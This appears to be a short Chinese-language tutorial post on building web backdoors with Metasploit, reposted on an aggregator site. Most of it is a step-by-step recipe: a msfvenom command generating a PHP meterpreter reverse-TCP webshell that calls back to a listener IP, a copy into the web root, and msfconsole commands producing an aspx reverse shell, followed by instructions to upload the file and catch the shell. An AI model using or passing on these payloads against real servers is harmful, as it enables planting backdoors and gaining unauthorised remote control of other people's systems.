msfconsole web后门

Posted Zad

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了msfconsole web后门相关的知识,希望对你有一定的参考价值。

一、php后门

在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下:

  1. 使用msfvenom 创建一个webshell.php

  2. 上传到服务器

  3.开始监听

  4.访问webshell.php的页面

  5. 获得反弹Shell

payload :

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.48.154 -f raw > webshell.php
cp webshell.php /var/www/html

开始监听得到shell:

 

 二、 aspx 后门

  步骤与前面大致相同,就是payload有点小小区别吧。

按着步骤敲吧,

use windows/shell_reverse_tcp
info
set lhost 192.168.48.154
set lport 4444
save
generate -f aspx (或者asp)

 最后将生成的payload 复制出来上传到服务器,即可得到shelle

 

以上是关于msfconsole web后门的主要内容,如果未能解决你的问题,请参考以下文章

问题1 kali Linux. 我用msf生成了后门exe反弹马,发到测试主机,成功反弹后,发现

网页后门的网页后门和网页挂马

2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

WEB11-黑客入侵 后门问题

PHP被植入恶意软件后门

msfconsole使用教程